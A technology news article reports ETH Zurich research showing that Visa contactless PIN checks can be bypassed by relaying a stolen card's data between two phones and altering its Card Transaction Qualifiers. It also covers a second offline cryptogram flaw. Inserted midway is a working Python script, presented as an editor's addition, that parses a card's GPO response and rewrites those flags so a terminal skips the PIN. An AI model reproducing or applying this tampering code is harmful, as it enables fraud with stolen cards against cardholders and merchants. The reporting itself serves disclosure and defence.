
The PIN is useless in Visa contactless transactions

Academics bypass PINs for Visa contactless payments

By- Aarti Jatan

Researchers: "In other words, the PIN is useless in Visa contactless transactions."

A team of academics from Switzerland has found a design flaw that can be abused to bypass the PIN check for Visa contactless payments.

In practice, a criminal holding a stolen Visa contactless card can use it to pay for expensive goods above the contactless limit without ever entering the card's PIN.

The attack is hard to spot, the researchers said: to the cashier it looks like a customer paying with a mobile wallet on their smartphone.

In reality, the phone is relaying data from a (stolen) Visa contactless card hidden on the attacker's body.


HOW THE ATTACK WORKS

According to the research team, a successful attack needs four components: two Android smartphones, a purpose-built Android app developed by the researchers, and a Visa contactless card.

The app is installed on both phones; one phone acts as a card emulator, the other as a POS (point-of-sale) emulator.


The phone emulating a POS device is held close to the stolen card, while the phone emulating a card is presented to the merchant's real terminal to pay for the goods.

The idea behind the attack is that the POS emulator asks the card to authorise a payment, alters the transaction data the card returns, and forwards the altered data over WiFi to the card emulator, which presents it to the real terminal. Because the attacker has rewritten the fields that tell the terminal whether a PIN is required, the terminal approves a large payment without asking for one.

"Our app does not require root privileges or any fancy hacks to Android and we have successfully used it on Pixel and Huawei devices," researchers said.


ATTACK CAUSED BY AN ISSUE WITH THE VISA CONTACTLESS PROTOCOL

At the technical level, the researchers said the attack is possible because of what they describe as design flaws in the EMV standard and in Visa's contactless protocol.

These flaws let an attacker alter data exchanged during a contactless transaction, including the fields that carry transaction details and that state whether the cardholder has been verified.

"The cardholder verification method used in a transaction, if any, is neither authenticated nor cryptographically protected against modification," researchers said.

"The attack consists in a modification of a card-sourced data object (the Card Transaction Qualifiers) before delivering it to the terminal," they added.

"The modification instructs the terminal that: (1) PIN verification is not required, and (2) the cardholder was verified on the consumer's device (e.g., a smartphone)."

The modification is made on the phone running the POS emulator, sent to the card-emulator phone, and relayed to the real POS terminal. The terminal has no way to detect the change because, as the researchers note, the Card Transaction Qualifiers are not cryptographically protected by anything the terminal can check.
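To make the relay-and-modify step in the "How the attack works" section and the Card Transaction Qualifiers (CTQ) rewrite described above concrete, here is a small Python model of what the POS-emulator phone does to the card's GET PROCESSING OPTIONS (GPO) response before forwarding it. This is an added example, not the ETH Zurich team's app and not code from the article. The tag numbers (0x77 response template, 9F6C for the CTQ, 9F26 for the Application Cryptogram) and the CTQ bit positions are taken from the public Visa contactless data element layout as the editor recalls it and should be treated as assumptions to check against the specification; the sample GPO response is constructed, not captured from a card.

```python
# Added example (not the researchers' app, nor code from the article):
# a minimal model of the relay-and-modify step.  The POS-emulator phone
# receives the card's GET PROCESSING OPTIONS (GPO) response, rewrites the
# Card Transaction Qualifiers (tag 9F6C), and forwards the result; the
# card-emulator phone replays it to the real terminal unchanged.
#
# Assumptions: tag numbers and the CTQ bit layout below follow the public
# Visa contactless data element definitions as recalled here, not the
# paper; the GPO response is constructed, not captured from a card.

CTQ_TAG = b"\x9f\x6c"          # Card Transaction Qualifiers, 2 bytes
AC_TAG = b"\x9f\x26"           # Application Cryptogram, 8 bytes
GPO_TEMPLATE = b"\x77"         # format 2 GPO response template

# CTQ byte 1
CTQ_ONLINE_PIN_REQUIRED = 0x80  # bit 8
CTQ_SIGNATURE_REQUIRED = 0x40   # bit 7
# CTQ byte 2
CTQ_CDCVM_PERFORMED = 0x80      # bit 8: consumer device CVM performed


def parse_tlv(data: bytes) -> list:
    """Minimal BER-TLV parser returning [(tag_bytes, value_bytes), ...].

    Supports multi-byte tags and one- or two-byte long-form lengths,
    which covers a GPO response.  Constructed templates (0x77) are
    returned with their raw contents; parse them again to descend.
    """
    items, i = [], 0
    while i < len(data):
        start = i
        if data[i] & 0x1F == 0x1F:        # multi-byte tag
            i += 1
            while data[i] & 0x80:         # continuation bytes
                i += 1
        i += 1
        tag = data[start:i]
        length = data[i]
        i += 1
        if length & 0x80:                 # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        if len(value) != length:
            raise ValueError("truncated TLV")
        i += length
        items.append((tag, value))
    return items


def encode_tlv(items) -> bytes:
    """Inverse of parse_tlv for values shorter than 65536 bytes."""
    out = bytearray()
    for tag, value in items:
        out += tag
        n = len(value)
        if n < 0x80:
            out.append(n)
        elif n < 0x100:
            out += b"\x81" + bytes([n])
        else:
            out += b"\x82" + n.to_bytes(2, "big")
        out += value
    return bytes(out)


def get_tag(gpo_response: bytes, tag: bytes) -> bytes:
    """Return the value of `tag` inside the 0x77 template, or b''."""
    outer = parse_tlv(gpo_response)
    if len(outer) != 1 or outer[0][0] != GPO_TEMPLATE:
        raise ValueError("expected a format 2 GPO response")
    return dict(parse_tlv(outer[0][1])).get(tag, b"")


def describe_ctq(ctq: bytes) -> dict:
    """Decode the CTQ flags the terminal's CVM decision depends on."""
    return {
        "online_pin_required": bool(ctq[0] & CTQ_ONLINE_PIN_REQUIRED),
        "signature_required": bool(ctq[0] & CTQ_SIGNATURE_REQUIRED),
        "cdcvm_performed": bool(ctq[1] & CTQ_CDCVM_PERFORMED),
    }


def tamper_ctq(gpo_response: bytes) -> bytes:
    """The modification the POS-emulator phone applies before relaying.

    Clears 'online PIN required' and sets 'consumer device CVM performed';
    every other object, the cryptogram in 9F26 included, is forwarded
    byte-for-byte.  Nothing the terminal can verify is computed over the
    CTQ, so the rewritten response looks like one from a genuine wallet.
    """
    outer = parse_tlv(gpo_response)
    if len(outer) != 1 or outer[0][0] != GPO_TEMPLATE:
        raise ValueError("expected a format 2 GPO response")
    patched = []
    for tag, value in parse_tlv(outer[0][1]):
        if tag == CTQ_TAG:
            b1 = value[0] & ~CTQ_ONLINE_PIN_REQUIRED & 0xFF
            b2 = value[1] | CTQ_CDCVM_PERFORMED
            value = bytes([b1, b2])
        patched.append((tag, value))
    return encode_tlv([(GPO_TEMPLATE, encode_tlv(patched))])


# Constructed GPO response: AIP, ATC, a placeholder cryptogram, CID, and a
# CTQ that says "online PIN required, no consumer-device CVM".
SAMPLE_GPO_RESPONSE = bytes.fromhex(
    "77 1D"
    "82 02 2000"                  # AIP
    "9F36 02 0042"                # ATC
    "9F26 08 0102030405060708"    # AC (placeholder value)
    "9F27 01 80"                  # CID: ARQC, go online
    "9F6C 02 8000"                # CTQ: byte 1 bit 8 set, byte 2 clear
)

if __name__ == "__main__":
    before = describe_ctq(get_tag(SAMPLE_GPO_RESPONSE, CTQ_TAG))
    after = describe_ctq(get_tag(tamper_ctq(SAMPLE_GPO_RESPONSE), CTQ_TAG))
    print("card said:    ", before)
    print("terminal sees:", after)
```

Running the script shows the card asking for an online PIN and the relayed response claiming the cardholder was already verified on a consumer device, with the cryptogram and every other field byte-identical. The defence the paper proposes follows directly from the model: the card must include the CTQ in data it signs (or cryptographically binds) so that the terminal can reject a response whose CTQ no longer matches.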

This security issue was discovered earlier this year by academics from the Swiss Federal Institute of Technology (ETH) in Zurich.

ETH Zurich researchers said they tested their attack in the real world, in real stores, without facing any issues. The attack was successful at bypassing PINs on Visa Credit, Visa Electron, and VPay cards, they said.

A Visa spokesperson did not return an email seeking comment on the research paper's findings, which ZDNet sent on Thursday, but the ETH Zurich team said they notified Visa of their findings.


SECOND ATTACK DISCOVERED, ALSO IMPACTING MASTERCARD

To find this bug, the research team said they used a modified version of Tamarin, a symbolic protocol-verification tool that had previously been used to uncover subtle weaknesses in the TLS 1.3 handshake and in the 5G authentication protocol.

Besides the PIN bypass on Visa contactless cards, the same tool also discovered a second security issue, this time impacting both Mastercard and Visa. Researchers explain:

"Our symbolic analysis also reveals that, in an offline contactless transaction with a Visa or an old Mastercard card, the card does not authenticate to the terminal the Application Cryptogram (AC), which is a card-produced cryptographic proof of the transaction that the terminal cannot verify (only the card issuer can). This enables criminals to trick the terminal into accepting an unauthentic offline transaction. Later on, when the acquirer submits the transaction data as part of the clearing record, the issuing bank will detect the wrong cryptogram, but the criminal is already long gone with the goods."

Unlike the first bug, the research team said it did not test this second attack in real stores, for ethical reasons: an offline transaction with a bogus cryptogram would only be caught at clearing, so the merchant would have been defrauded.

Additional details about the team's research can be found in a paper preprint entitled "The EMV Standard: Break, Fix, Verify." Researchers are also scheduled to present their findings at the IEEE Symposium on Security and Privacy, next year, in May 2021.
